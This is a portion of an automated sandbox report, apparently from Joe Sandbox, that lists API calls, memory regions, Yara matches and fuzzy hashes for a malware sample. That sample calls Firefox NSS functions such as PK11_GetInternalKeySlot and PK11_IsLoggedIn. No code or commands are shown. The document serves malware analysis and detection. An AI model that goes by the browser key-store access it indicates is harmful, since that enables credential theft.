                                                                                                                                                                                                              • Instruction ID: 1cc1cacab3b37365d097a68b3cc2ea5f5a25b212a8183ebdf87fbf3678863626
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bd40981f08325fa997d2231ca832bee5e36db316787db991e808c7610808951
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E715571A00318CFDF10CFAAD580A8AB7B4FF89718F25816DD9596BB02D770A946CF91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CAEBF06
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAEBF56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,6CAC9F71,?,?,00000000), ref: 6CAEBF7F
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CAEBFA9
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAEC014
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3689625208-0
                                                                                                                                                                                                              • Opcode ID: 5aa697b32d7b93d6ba2a2bd842e3f943f21f3f13d2440b1150b7d4554a15ebf7
                                                                                                                                                                                                              • Instruction ID: 952840a1c62fb4c4131f26415b107e8ace9bfd57090988ff288fdd7ab3700a9f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aa697b32d7b93d6ba2a2bd842e3f943f21f3f13d2440b1150b7d4554a15ebf7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D641D671A013059BEB00CE66DD44BBF77B9AF48208F194228E919D7B41FB31E985DBD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CABEDFD
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000000), ref: 6CABEE64
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CABEECC
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CABEEEB
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CABEEF6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3833505462-0
                                                                                                                                                                                                              • Opcode ID: 5fc5f3c1ca3dbe6afc5d360ef6e8ee74c145d9c477fe6ba202f6e1f5344e81d9
                                                                                                                                                                                                              • Instruction ID: 79b75439016bd7ec1b66e76a69fd3628084bcd3ceef8eb701f1f37fd26b6f8a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fc5f3c1ca3dbe6afc5d360ef6e8ee74c145d9c477fe6ba202f6e1f5344e81d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7313AB1A00240BBE7209F2DCC45B667BF8FB46315F180568F85A97B51D731E894CBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CAE6295,?,00000000,00000000,00000001,6CB02653,?), ref: 6CB01ECB
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000001,?,?,6CAE6295,?,00000000,00000000,00000001,6CB02653,?), ref: 6CB01EF1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB01F01
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB01F39
                                                                                                                                                                                                                • Part of subcall function 6CB0FE20: TlsGetValue.KERNEL32(6CAE5ADC,?,00000000,00000001,?,?,00000000,?,6CADBA55,?,?), ref: 6CB0FE4B
                                                                                                                                                                                                                • Part of subcall function 6CB0FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CB0FE5F
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB01F67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 704537481-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CAC1E0B
                                                                                                                                                                                                              • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CAC1E24
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC1E3B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CAC1E8A
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CAC1EAD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1529734605-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,6CAC3FFF,00000000,?,?,?,?,?,6CAC1A1C,00000000,00000000), ref: 6CACADA7
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CAC3FFF,00000000,?,?,?,?,?,6CAC1A1C,00000000,00000000), ref: 6CACADB4
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,6CAC3FFF,?,?,?,?,6CAC3FFF,00000000,?,?,?,?,?,6CAC1A1C,00000000), ref: 6CACADD5
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB18D2D,?,00000000,?), ref: 6CB1FB85
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB1FBB1
                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBE94B0,?,?,?,?,?,?,?,?,6CAC3FFF,00000000,?), ref: 6CACADEC
                                                                                                                                                                                                                • Part of subcall function 6CB1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBF18D0,?), ref: 6CB1B095
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAC3FFF), ref: 6CACAE3C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2372449006-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C), ref: 6CAE8EA2
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CB0F854
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CB0F868
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CB0F882
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(04C483FF,?,?), ref: 6CB0F889
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CB0F8A4
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CB0F8AB
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CB0F8C9
                                                                                                                                                                                                                • Part of subcall function 6CB0F820: free.MOZGLUE(280F10EC,?,?), ref: 6CB0F8D0
                                                                                                                                                                                                              • PK11_IsLoggedIn.NSS3(?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C), ref: 6CAE8EC3
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C), ref: 6CAE8EDC
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CB02E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAE8EF1
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAE8F20
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1978757487-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3576935931-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB01E10: TlsGetValue.KERNEL32 ref: 6CB01E36
                                                                                                                                                                                                                • Part of subcall function 6CB01E10: EnterCriticalSection.KERNEL32(?,?,?,6CADB1EE,2404110F,?,?), ref: 6CB01E4B
                                                                                                                                                                                                                • Part of subcall function 6CB01E10: PR_Unlock.NSS3 ref: 6CB01E76
                                                                                                                                                                                                              • free.MOZGLUE(?,6CAED079,00000000,00000001), ref: 6CAECDA5
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CAED079,00000000,00000001), ref: 6CAECDB6
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CAED079,00000000,00000001), ref: 6CAECDCF
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,6CAED079,00000000,00000001), ref: 6CAECDE2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAECDE9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB55B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB55B56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB52CEC
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52D02
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52D1F
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52D42
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52D5B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB55B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB55B56
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB52D9C
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52DB2
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CB52DCF
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52DF2
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CB52E0B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBDC3
                                                                                                                                                                                                              • free.MOZGLUE(?,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBDCA
                                                                                                                                                                                                              • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBDE9
                                                                                                                                                                                                              • free.MOZGLUE(?,00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBE21
                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBE32
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Free.NSS3(?), ref: 6CBD7C73
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBD7C83
                                                                                                                                                                                                              • malloc.MOZGLUE(00000001), ref: 6CBD7C8D
                                                                                                                                                                                                              • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CBD7C9F
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7CAD
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 105370314-0
                                                                                                                                                                                                              • Opcode ID: 4993a99ac45dce3461ac48dae0876278a64bc9da535c22e318be400359ddd514
                                                                                                                                                                                                              • Instruction ID: 477b1ec94d6cf448fa345db001108fe74aa55b1efdf8ee8db28cbc0adfc91142
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4993a99ac45dce3461ac48dae0876278a64bc9da535c22e318be400359ddd514
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38F0C2B19102966FEB009F7AAC0998B7798EF00265B068435E809D3B00E730F114CAE9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6CBDA6D8), ref: 6CBDAE0D
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBDAE14
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6CBDA6D8), ref: 6CBDAE36
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBDAE3D
                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,?,6CBDA6D8), ref: 6CBDAE47
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 682657753-0
                                                                                                                                                                                                              • Opcode ID: e1a43463eb743f21e30d8a5714e436d232eb5de468e4adfb77da368c3e2a0c3c
                                                                                                                                                                                                              • Instruction ID: b065009924d804a7a2d4bf0d3aa8e73488338c7c7907b818097ddc6ae17373ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1a43463eb743f21e30d8a5714e436d232eb5de468e4adfb77da368c3e2a0c3c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F0F675201A02A7CA019F69E8499177BBCFF867747200338F12A83D40D731F121CBD2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 009468B5
                                                                                                                                                                                                                • Part of subcall function 00944AE4: __getptd_noexit.LIBCMT ref: 00944AE7
                                                                                                                                                                                                                • Part of subcall function 00944AE4: __amsg_exit.LIBCMT ref: 00944AF4
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 009468CC
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 009468DA
                                                                                                                                                                                                              • __lock.LIBCMT ref: 009468EA
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 009468FE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: 3ac57ed0c2b0d0a678abaa46dca2566de264470c69a34a571c7c183117c03963
                                                                                                                                                                                                              • Instruction ID: 36202aa310b01657ac4a3ad839585c5724f93e47347e2a06d643f2584d5e882b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ac57ed0c2b0d0a678abaa46dca2566de264470c69a34a571c7c183117c03963
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF024B29453108BD720FBB8A803F0E33A0AF80721F200119F000AB2D2CB349840DF5A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA67D35
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                              • Opcode ID: 4992fe9c272e913c293fd8911e7c9f9919baff5331336fd202a526e03cdb623a
                                                                                                                                                                                                              • Instruction ID: d4325fc70f9bae8fbafb8ad6575373e112b358d4ae401705fe70c40b6130e4c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4992fe9c272e913c293fd8911e7c9f9919baff5331336fd202a526e03cdb623a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41313571E142299BC710CF9EC8809BEB7F1EF88309B590596E554F7B82E271D891CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0093006F
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094ED9D
                                                                                                                                                                                                                • Part of subcall function 0094ED88: __CxxThrowException@8.LIBCMT ref: 0094EDB2
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094EDC3
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 0093010E
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00930122
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                              • API String ID: 2448322171-3788999226
                                                                                                                                                                                                              • Opcode ID: 50852dc28626dc915dd4be79a4de092db8b01e8a239383221faa4906bfffb929
                                                                                                                                                                                                              • Instruction ID: 47995b78a468f7eb43b6f580e52a971d8509471ed7575074c2ff9f48168926f1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50852dc28626dc915dd4be79a4de092db8b01e8a239383221faa4906bfffb929
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1331EE76E402168FD714EFACDC55B9E77A5AF88714F11057AE534EB290DA74DC808F40
